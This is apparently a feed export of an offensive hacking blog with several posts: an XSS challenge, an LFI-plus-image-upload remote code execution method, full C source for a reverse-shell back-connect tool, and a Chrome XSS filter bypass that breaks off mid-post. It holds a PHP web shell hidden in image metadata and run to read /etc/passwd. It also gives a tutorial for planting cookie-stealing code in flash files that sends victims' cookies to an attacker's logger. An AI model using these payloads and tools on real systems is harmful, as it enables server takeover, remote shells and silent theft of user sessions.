tag:blogger.com,1999:blog-25114504839045366062024-03-05T16:12:39.688-08:00Hackers2DevNull - Hacking To Learn | Learning To DefendUnknownnoreply@blogger.comBlogger16125tag:blogger.com,1999:blog-2511450483904536606.post-43910946712362464762013-12-18T12:21:00.003-08:002014-06-09T12:56:37.331-07:00r0ng's XSS Challenges - Challenge 3<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/8rz3DBZ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/8rz3DBZ.png" height="286" width="640" /></a></div>
XSS Challenge is back, challenge No. 3!<br />
<br />
<br />
<a name='more'></a><br />
Link: <a href="http://dfu123.comule.com/xsschallenge3.php">http://dfu123.comule.com/xsschallenge3.php</a><br />
<br />
Challenge: Create a pop-up message with your name! Post a comment with the vector, I moderate the comments so will see it and add your name to the solvers list:<br />
<br />
<b>Solvers:</b><br />
smiegles<br />
<a href="https://plus.google.com/+RafayBaloch/posts" target="_blank">Rafay Baloch</a><br />
<br />
//Thanks to <a href="http://www.blogger.com/profile/17178762421947730931">gopal patel</a> for your suggestion.<br />
//Matius, the vector you posted didn't work :/ Latest Firefox.<br />
//<a href="http://www.blogger.com/profile/05386415187257615577">CodeFusion</a> your vector doesn't work- parenthesis are escaped <br />
<br />
<br />Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2511450483904536606.post-11854211362760136652013-10-31T11:32:00.002-07:002013-11-02T11:07:43.064-07:00LFI vulnerability + image upload form? You got Remote Code Execution!<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/xHdYujh.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="http://i.imgur.com/xHdYujh.jpg" width="320" /></a></div>
An easy RCE when you find a LFI vulnerability and are able to upload images/any other file to the website.<br />
<br />
<a name='more'></a><br />
<br />
I recently came across a forum post where a website admin's site was hacked and he found this in his php error logs:<br />
<br />
<span style="background-color: #cccccc;">[error] [client <a href="http://www.hackforums.net/ipcheck.php?action=iplookup&ipaddress=113.1.1.1">113.1.1.1</a>]
PHP Warning: Unexpected character in input: '\x01' (ASCII=1) state=0 in
/var/www/html/photo/123.gif : eval()'d code on line 1, referer:
site.com </span><br />
<br />
This reminded me of the technique I illustrated in this blog post where php code could be smuggled into real images: <a href="http://hackers2devnull.blogspot.co.uk/2013/05/how-to-shell-server-via-image-upload.html">http://hackers2devnull.blogspot.co.uk/2013/05/how-to-shell-server-via-image-upload.html</a>.<br />
<br />
That method, however, is dependent on the file extension uploaded actually being interpreted as PHP which relies on insecure upload code. The /photo/ folder was also being blocked from accessing directly in the httpd.conf file:<br />
<br />
<span style="background-color: #cccccc;"><Directory /var/www/html/photo><br />
Order Deny,Allow<br />
Deny from All<br />
</Directory> </span><span style="background-color: #cccccc;"><br /></span><br />
<br />
So how was it done? Here is one possible explanation-<b> RCE via LFI/Image upload</b> (which assumes there is a local file inclusion vulnerability somewhere else on the website):<br />
<br />
The photo folder isn't accessible to site users, however this restriction doesn't apply to local file includes. So, assuming we can upload a 'trojanised' image to the server, we can use a local file inclusion vulnerability elsewhere on the site to include it and run arbitrary php code.<br />
<br />
This process has been illustrated below: the following code was inserted into a simple image (see earlier link on how to do it) which passes parameters to shell_exec.<br />
<br />
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><br /><span style="color: #66ccff;"></span></code></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a 1em="" href="http://i.imgur.com/4re5xhE.jpg" imageanchor="1" margin-left:="" margin-right:="" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="1" src="http://i.imgur.com/4re5xhE.jpg" /></a></div>
<br />
<-- Inserted into comments meta data field.<br />
<br />
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #66ccff;"><?</span><span style="color: #7ac07c;">if(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'r0ng'</span><span style="color: #7ac07c;">]){echo</span><span style="color: #ff99ff;">"<pre>"</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">shell_exec</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">"r0ng"</span><span style="color: #7ac07c;">]);}</span><span style="color: #66ccff;">?></span></code></span></div>
</div>
<br />
<br />
<br />
<br />
<br />
In the document root we have an insecure (too say the least) php file that is vulnerable to local file inclusion:<br />
<br />
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #66ccff;"><?php</span><span style="color: #7ac07c;"> include(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'file'</span><span style="color: #7ac07c;">]);</span><span style="color: #66ccff;">?></span></code></span></div>
<div dir="ltr">
</div>
</div>
<br />
The result, by including the path to the image, is RCE:<br />
<br />
<span style="background-color: #cccccc;"><b>http://vulnsite.com/includes.php?file=forum/images/shellexec.jpg&r0ng=cat /etc/passwd </b></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/BELKYUU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="http://i.imgur.com/BELKYUU.png" width="640" /></a></div>
<br />
Any errors in the code that was inserted into the image would be reported as PHP errors in the image itself as opposed to the include file which might explain the weird error reported by the website admin.<br />
<span style="font-style: italic;">Caveat, this is obviously dependent on the severity of the LFI vulnerability in being to include a non-php extension file.</span> <br />
<br />
<br />
(If you find this useful, why not checkout a advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span><br />
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-4346202273742334892013-10-23T13:58:00.000-07:002013-10-23T14:10:01.771-07:00[Release!] Backcat - Back-connect Utility [*nix]<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/KYt0Osx.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/KYt0Osx.jpg" width="320" /></a></div>
<br />
[<b><span style="color: blue;">+</span></b>] Outline:<br />
A simple utility for making life easier when back-connecting from a foreign host where firewall rules are not known. Run a copy locally specifying a port range to listen on (optionally specify another program to handle the connection). And on the server run a copy specifying the port destination range to try and 'brute-force' (optionally specify a local port range to bind to instead of taking the first available / and optionally specify a program to pass the connection to, e.g. "/bin/sh -i").<br />
<br />
<br />
<a name='more'></a>[<b><span style="color: blue;">+</span></b>] Notes:<br />
Port range limited to 1024 per process due to using select() instead of poll(). Reason is because debugging poll on older distros gives me a headache!<br />
<br />
[<b><span style="color: blue;">+</span></b>] C source:<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"> <code style="color: black; word-wrap: normal;">
/* #####################################
* BACKCAT::Back-connect Utility
* Ver: 0.2 | OS: *nix | by: r0ng
* (Hackers2devnull.blogspot.co.uk)
* #####################################
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <unistd.h>
#include <getopt.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <dirent.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/tcp.h>
#define VERSION "0.2"
static int silent = 0;
static void print_help ()
{
printf ("BACKCAT::Back-connect Utility v%s\n\n", VERSION);
printf ("Options:\n"
" -m, --mode=client|server start application as \"client\" (bind and connect) or as \"server\" (bind and listen)\n"
" -h, --host host to connect to\n"
" -p, --port port or ports range. Example: -p 2000-3000\n"
" -b, --bind port to bind or ports bind range (by default use the first available port). Example: -b 5000-6000\n"
" -r, --run=PROGRAM program to exec after connect\n"
" -s, --silent suppress any output\n"
" --version display version information and exit\n"
" --help display this help and exit\n"
" Example (remote host): ./backcat -m client -h yourip -p 2000-3000 -r \"/bin/sh -i\" \n"
" Example (local host) : ./backcat -m server -p 2000-3000 \n"
);
printf ("\n");
}
static int parse_ports (const char *range, int *start_port, int *end_port)
{
char *next;
*start_port = strtol (range, &next, 10);
if (next && next[0] == '-')
*end_port = strtol (next + 1, NULL, 10);
return 1;
}
static void exec_app (char *app, int fd)
{
int pid;
char *p, *tmp;
printf ("Passing control to the specified program \n");
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
p = strstr (app, " ");
tmp = strstr (app, " ");
if (p)
p++;
if (tmp)
*tmp = '\0';
execlp(app, app, p, NULL);
}
int is_in_array (int *array, int array_len, int item)
{
int i;
for (i = 0; i <= array_len; i++) {
if (array[i] == item)
return 1;
}
return 0;
}
static void run_server (int start_port, int end_port, const char *app)
{
int i, j;
int total_ports = (end_port - start_port) + 1;
int *sockets;
int yes=1;
fd_set master;
fd_set read_fds;
int fdmax;
socklen_t addrlen;
struct sockaddr_storage remoteaddr;
int newfd;
char remote_ip[100];
int nbytes;
int fd_stdin;
int read_ret = 0, write_ret;
unsigned char buf[1024];
int accepted_fd = 0;
int flag = 1;
sockets = malloc (sizeof (int) * total_ports);
FD_ZERO(&master);
FD_ZERO(&read_fds);
fd_stdin = STDIN_FILENO;
fdmax = 1 + fd_stdin;
j = 0;
for (i = start_port; i <= end_port; i++) {
struct sockaddr_in name;
sockets[j] = socket (AF_INET, SOCK_STREAM, 0);
if (sockets[j] < 0) {
printf ("error: could not create socket. %s\n", strerror (errno));
return;
}
setsockopt (sockets[j], SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int));
memset (&name, 0, sizeof (name));
name.sin_family = AF_INET;
name.sin_port = htons (i);
name.sin_addr.s_addr = htonl (INADDR_ANY);
if (bind (sockets[j], (struct sockaddr *) &name, sizeof (name)) < 0) {
printf ("error: could not bind socket on port %d. %s\n", i, strerror (errno));
return;
}
if (listen (sockets[j], 128) == -1) {
printf ("error: could not listen on port %d. %s\n", i, strerror (errno));
return;
}
FD_SET(sockets[j], &master);
fdmax = sockets[j];
j++;
}
if (!silent)
printf ("Server is listening on %d ports\n", total_ports);
FD_SET(fd_stdin, &master);
while (1) {
read_fds = master;
if (select (fdmax + 1, &read_fds, NULL, NULL, NULL) == -1) {
printf ("error: select () failed. %s\n", strerror (errno));
continue;
}
for (i = 0; i <= fdmax; i++) {
if (FD_ISSET(i, &read_fds)) {
if (i == fd_stdin) {
read_ret = read(fd_stdin, buf, sizeof(buf));
if (accepted_fd) {
if (send (accepted_fd, buf, read_ret, 0) == -1) {
printf ("error: send () failed. %s\n", strerror (errno));
}
read_ret = 0;
}
} else if (is_in_array (sockets, total_ports, i)) {
addrlen = sizeof remoteaddr;
newfd = accept (i, (struct sockaddr *)&remoteaddr, &addrlen);
if (newfd == -1) {
printf ("error: accept () failed. %s\n", strerror (errno));
} else {
FD_SET(newfd, &master);
if (newfd > fdmax) {
fdmax = newfd;
}
int result = setsockopt(newfd, IPPROTO_TCP, TCP_NODELAY, (char *) &flag, sizeof(int));
if (!silent)
printf("new connection from %s:%d on socket %d\n",
inet_ntop(remoteaddr.ss_family,
&(((struct sockaddr_in*)&remoteaddr)->sin_addr),
remote_ip, 100),
ntohs (((struct sockaddr_in*)&remoteaddr)->sin_port),
newfd);
accepted_fd = newfd;
}
} else {
if ((nbytes = recv(i, buf, sizeof buf, 0)) <= 0) {
if (nbytes == 0) {
if (!silent)
printf("socket %d closed\n", i);
} else {
printf ("socket %d, %s\n", i, strerror (errno));
}
close(i);
FD_CLR(i, &master);
accepted_fd = 0;
} else {
buf[nbytes] = '\0';
printf ("%s\n", buf);
}
}
}
}
}
}
static int run_client (char *host, int start_port, int end_port, int bind_port, char *app)
{
int i, numbytes;
int sockfd;
char out_buf[] = "magictoken";
char in_buf[1024];
int yes=1;
struct linger fix_ling;
for (i = start_port; i <= end_port; i++) {
struct sockaddr_in sa_dst;
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf ("error: could not create socket. %s\n", strerror (errno));
continue;
}
fix_ling.l_onoff = 1;
fix_ling.l_linger = 0;
setsockopt(sockfd, SOL_SOCKET, SO_LINGER, &fix_ling, sizeof(fix_ling));
setsockopt (sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int));
if (bind_port > -1) {
struct sockaddr_in name;
memset (&name, 0, sizeof (struct sockaddr_in));
name.sin_family = AF_INET;
name.sin_port = htons (bind_port);
name.sin_addr.s_addr = htonl (INADDR_ANY);
if (bind (sockfd, (struct sockaddr *) &name, sizeof (struct sockaddr)) < 0) {
if (!silent)
printf ("error: could not bind socket on port %d. %s\n", bind_port, strerror (errno));
return 0;
}
}
memset(&sa_dst, 0, sizeof(struct sockaddr_in));
sa_dst.sin_family = AF_INET;
sa_dst.sin_port = htons (i);
sa_dst.sin_addr.s_addr = inet_addr (host);
if (connect(sockfd, (struct sockaddr *)&sa_dst, sizeof(struct sockaddr)) == -1) {
close(sockfd);
continue;
}
if (!silent) {
struct sockaddr_in sin;
socklen_t addrlen = sizeof(sin);
int local_port = 0;
if (getsockname (sockfd, (struct sockaddr *)&sin, &addrlen) == 0 &&
sin.sin_family == AF_INET &&
addrlen == sizeof(sin))
{
local_port = ntohs(sin.sin_port);
}
printf("Connection establish. Local-Port:%d Remote-Port:%d\n", local_port, i);
}
if (app) {
exec_app (app, sockfd);
return 1;
} else {
if ((numbytes = send (sockfd, out_buf, strlen (out_buf), 0)) == -1) {
printf ("error: send () failed. %s\n", strerror (errno));
close(sockfd);
continue;
}
if (!silent)
printf("client sent %d bytes: %s\n", numbytes, out_buf);
if ((numbytes = recv(sockfd, in_buf, sizeof (in_buf) -1, 0)) == -1) {
printf ("error: recv () failed. %s\n", strerror (errno));
close (sockfd);
continue;
}
in_buf[numbytes] = '\0';
if (!silent)
printf("client received %d bytes: %s\n", numbytes, in_buf);
close(sockfd);
if (!strcmp (in_buf, out_buf))
return 1;
}
}
return 0;
}
static void run_clients (char *host, int start_port, int end_port, int start_bind, int end_bind, char *app)
{
if (start_bind == -1) {
if (run_client (host, start_port, end_port, -1, app))
return;
} else {
int i;
for (i = start_bind; i <= end_bind; i++) {
if (run_client (host, start_port, end_port, i, app))
return;
}
}
if (!silent)
printf ("Failed to establish connection!\n");
}
int main (int argc, char *argv[])
{
int start_port = -1;
int end_port = -1;
int start_bind = -1;
int end_bind = -1;
char ch;
int option_index = 0;
char *host = NULL;
char *mode = NULL;
char *app = NULL;
static const struct option long_options[] = {
{"mode", required_argument, NULL, 'm'},
{"host", required_argument, NULL, 'h'},
{"port", required_argument, NULL, 'p'},
{"bind", required_argument, NULL, 'b'},
{"run", required_argument, NULL, 'r'},
{"silent", required_argument, NULL, 's'},
{"version", no_argument, NULL, 1},
{"help", no_argument, NULL, 0},
{0, 0, 0, 0}
};
if (argc < 2) {
print_help ();
return 0;
}
while ((ch = getopt_long (argc, argv, "m:h:p:b:r:s", long_options, &option_index)) != -1) {
switch (ch) {
case 'm':
mode = strdup (optarg);
break;
case 'h':
host = strdup (optarg);
break;
case 'p':
if (parse_ports (optarg, &start_port, &end_port) == 0) {
printf ("Failed to parse port range \"%s\". Exiting.\n", optarg);
return 1;
}
break;
case 'b':
if (parse_ports (optarg, &start_bind, &end_bind) == 0) {
printf ("Failed to parse port range \"%s\". Exiting.\n", optarg);
return 1;
}
break;
case 'r':
app = strdup (optarg);
break;
case 's':
silent = 1;
break;
case 1:
fprintf (stdout, "BACKCAT::Back-connect Utility v%s\n", VERSION);
fprintf (stdout, "By ~r0ng (Hackers2devnull.blogspot.co.uk)\n");
return 0;
case 0:
print_help ();
return 0;
default:
print_help ();
return 0;
}
}
if (mode == NULL) {
printf ("\"mode\" parameter is not specified! Please specify either \"client\" or \"server\". Exiting.\n");
return 1;
}
if (strcmp (mode, "client") && strcmp (mode, "server")) {
printf ("Invalid \"mode\" parameter! Please specify either \"client\" or \"server\". Exiting.\n");
return 1;
}
if (start_port == -1) {
printf ("Port or port range is not specified! Exiting.\n");
return 1;
}
if (end_port > -1 && end_port < start_port) {
printf ("Incorrect port range specified! Exiting.\n");
return 1;
}
if (end_bind > -1 && end_bind < start_bind) {
printf ("Incorrect port range specified! Exiting.\n");
return 1;
}
if (end_port == -1)
end_port = start_port;
if (end_bind == -1)
end_bind = start_bind;
if (!strcmp (mode, "server")) {
run_server (start_port, end_port, app);
} else if (!host) {
printf ("\"host\" is not specified. Exiting.\n");
} else {
run_clients (host, start_port, end_port, start_bind, end_bind, app);
}
return 0;
}
</code>
</pre>
<br />
(If you find this useful, why not checkout a advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span><br />
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-70303577376859301022013-09-25T01:53:00.002-07:002015-05-02T02:17:15.191-07:00How to hide XSS in flash movies/games<div class="post_body" id="pid_35379975">
<div style="text-align: center;">
<img alt="[Image: Adobe-moves-to-patch-zero-day-XSS-vulner...ge2_70.jpg]" border="0" src="http://www.thetechherald.com/media/images/201148/Adobe-moves-to-patch-zero-day-XSS-vulnerability-Image2_70.jpg" height="305" width="320" /></div>
<br />
Here is a tutorial on how to rip and edit an existing flash movie/game
for use in XSS attacks. The objective is to steal cookies silently
without changing the flash movie's behavior from the perspective of the
user.</div>
<div class="post_body" id="pid_35379975">
<a name='more'></a><br />
<br />
<span style="color: deepskyblue;">Intro</span><br />
When a site allows you to upload .swf (flash) files or to embed a flash
file as an object, it may be possible to create an XSS vulnerability so
long as the parameter: allowScriptAccess=<span style="font-weight: bold;">never</span> is not specified in the embed code. <br />
<br />
<span style="color: deepskyblue;">Some tools needed:</span><br />
<ul>
A SWF file decompiler (<a href="http://www.sothink.com/product/flashdecompiler/" target="_blank">link</a>) (note: I have the full version, the demo is limited)</ul>
<ul>
A FLA editor (I use Adobe Flash CS6)</ul>
<br />
<span style="color: deepskyblue;">Concept:</span><br />
Through Actionscript- Flash's scripting language, calls can be made to
external javascript in markup and also arbitrary functions. We will
inject some cookie stealing code into an existing actionscript function
after decompiling it, then recompile it again. This will work on the
major browsers and is compatible with Actionscript 2 and 3 (the latest
version).<br />
<br />
<span style="color: deepskyblue;">Step 1:</span><br />
Navigate to a page where a flash movie or game loads, and either check
the page source for the url to the flash file (ending .swf), or like
shown below use firefox to go: tools>page info>media, and save
file as to download it.<br />
<img alt="[Image: ZrZOvyt.png]" border="0" src="http://i.imgur.com/ZrZOvyt.png" height="243" width="640" /><br />
<br />
<span style="color: deepskyblue;">Step 2:</span><br />
Once you have acquired the sothink decompiler open up the file you just downloaded and export it as a .fla file:<br />
<br />
<img alt="[Image: iKBfvXO.png]" border="0" src="http://i.imgur.com/iKBfvXO.png" /><br />
<br />
<span style="color: deepskyblue;">Step 3:</span><br />
Open the .fla file in your editor, Adobe Flash CS6 in my case, and
select the first frame of the movie, right click>Actions. This will
bring up the Actionscript editor.<br />
<br />
<img alt="[Image: bxg3iC6.png]" border="0" src="http://i.imgur.com/bxg3iC6.png" /><br />
<br />
<span style="color: deepskyblue;">Step 4:</span><br />
Find the beginning actionscript for the 'scene' and before any other code paste the following:<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;"><span style="color: #66ccff;">flash</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">external</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">ExternalInterface</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">call</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"eval"</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">"var a = new XMLHttpRequest(); a.open('get', 'http://YourEvilSite.com/logger.php?cookie=' + document.cookie); a.send();"</span></span><span style="color: #7ac07c;"><span style="background-color: black;">); </span></span></code></div>
</div>
</div>
<br />
<img alt="[Image: veZhfdm.png]" border="0" src="http://i.imgur.com/veZhfdm.png" height="104" width="400" /><br />
<br />
<span style="color: deepskyblue;">Step 5:</span><br />
<br />
From the File drop down, select export as movie:<br />
<br />
<img alt="[Image: yKEytXE.png]" border="0" src="http://i.imgur.com/yKEytXE.png" height="99" width="640" /><br />
<br />
<span style="color: deepskyblue;">Step 6:</span><br />
<br />
The file is now ready to be uploaded/embedded to your target site. It
should operate as normal but now behind the scenes whoever accesses it
will have their cookies stolen. May I recommend a cookie catcher I
prepared earlier!? (<a href="http://hackers2devnull.blogspot.co.uk/2013/08/r0ngs-cookie-logger-script-for-silently.html" target="_blank">link</a>).<br />
<br />
<img alt="[Image: D9O2Al6.png]" border="0" src="http://i.imgur.com/D9O2Al6.png" height="189" width="320" /><br />
<img alt="[Image: ukRbpVM.png]" border="0" src="http://i.imgur.com/ukRbpVM.png" height="96" width="640" /><br />
<br />
Demo (cookie stealing code replaced with alert box): <a href="http://dfu123.comule.com/swfxss.swf" target="_blank">http://dfu123.comule.com/swfxss.swf</a></div>
<div class="post_body" id="pid_35379975">
</div>
<div class="post_body" id="pid_35379975">
(If you find this useful, why not checkout a advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span></div>
<hr style="background: #000; width: 20%;" />
<b>Advertisements:</b><br />
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-46471726945022341832013-09-16T13:38:00.000-07:002015-10-27T14:42:26.016-07:00Weaknesses in google Chrome XSSAuditor - a bypass found!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-bybjwbIri2g/UPkSWM0K-3I/AAAAAAAABgs/yqNzamnhs_U/s400/Screen+Shot+2013-01-18+at+3.40.22+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="http://3.bp.blogspot.com/-bybjwbIri2g/UPkSWM0K-3I/AAAAAAAABgs/yqNzamnhs_U/s640/Screen+Shot+2013-01-18+at+3.40.22+PM.png" width="640" /></a></div>
<br />
<br />
<a name='more'></a><br />
<br />
<br />
The Chrome XSSAuditor is open source- I noticed that the auditor is weaker in certain branches
of markup than others such as in the <head>. Filtering by element
is handled in a slightly different manner depending on where the
injection appears within the major sections of markup, as in this case. Extract:<br />
<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;"><span style="color: #66ccff;">ASSERT</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">shouldAllowCDATA </span><span style="color: #7ac07c;">|| !</span><span style="color: #66ccff;">m_scriptTagNestingLevel</span><span style="color: #7ac07c;">); </span><span style="color: #66ccff;">346 ASSERT</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">shouldAllowCDATA </span><span style="color: #7ac07c;">|| !</span><span style="color: #66ccff;">m_scriptTagNestingLevel</span><span style="color: #7ac07c;">);<br /> </span><span style="color: #66ccff;">347 m_scriptTagNestingLevel</span><span style="color: #7ac07c;">++;<br /> </span><span style="color: #66ccff;">348 </span><span style="color: #7ac07c;">} else if (</span><span style="color: #66ccff;">hasName</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">token</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">objectTag</span><span style="color: #7ac07c;">))<br /> </span><span style="color: #66ccff;">349 didBlockScript </span><span style="color: #7ac07c;">|= </span><span style="color: #66ccff;">filterObjectToken</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span><span style="color: #7ac07c;">);<br /> </span><span style="color: #66ccff;">350 </span><span style="color: #7ac07c;">else if (</span><span style="color: #66ccff;">hasName</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">token</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">paramTag</span><span style="color: #7ac07c;">))<br /> </span><span style="color: #66ccff;">351 didBlockScript </span><span style="color: #7ac07c;">|= </span><span style="color: #66ccff;">filterParamToken</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span><span style="color: #7ac07c;">);<br /> </span><span style="color: #66ccff;">352 </span><span style="color: #7ac07c;">else if (</span><span style="color: #66ccff;">hasName</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">token</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">embedTag</span><span style="color: #7ac07c;">))<br /> </span><span style="color: #66ccff;">353 didBlockScript </span><span style="color: #7ac07c;">|= </span><span style="color: #66ccff;">filterEmbedToken</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span><span style="color: #7ac07c;">);<br /> </span><span style="color: #66ccff;">354 </span><span style="color: #7ac07c;">else if (</span><span style="color: #66ccff;">hasName</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">token</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">appletTag</span><span style="color: #7ac07c;">))<br /> </span><span style="color: #66ccff;">355 didBlockScript </span><span style="color: #7ac07c;">|= </span><span style="color: #66ccff;">filterAppletToken</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span><span style="color: #7ac07c;">);<br /> </span><span style="color: #66ccff;">356 </span><span style="color: #7ac07c;">else if (</span><span style="color: #66ccff;">hasName</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">token</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">iframeTag</span><span style="color: #7ac07c;">))<br /> </span><span style="color: #66ccff;">357 didBlockScript </span><span style="color: #7ac07c;">|= </span><span style="color: #66ccff;">filterIframeToken</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">request</span></span><span style="color: #7ac07c;"><span style="background-color: black;">); </span></span></code></div>
</div>
</div>
<br />
I found two tags which XSSAuditor can be bypassed if we can close the <body> tag with our
injection,<br />
<br />
Before I got a reply from Chrome team, I found that there was a deeper flaw in the timing of these checks - if malformed markup is auto-corrected or mutated by the browser within the <head> then the check is done too late before resolving in the doc.<br />
<br />
<img alt="[Image: B2d9b1a.png]" border="0" src="http://i.imgur.com/B2d9b1a.png" />
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
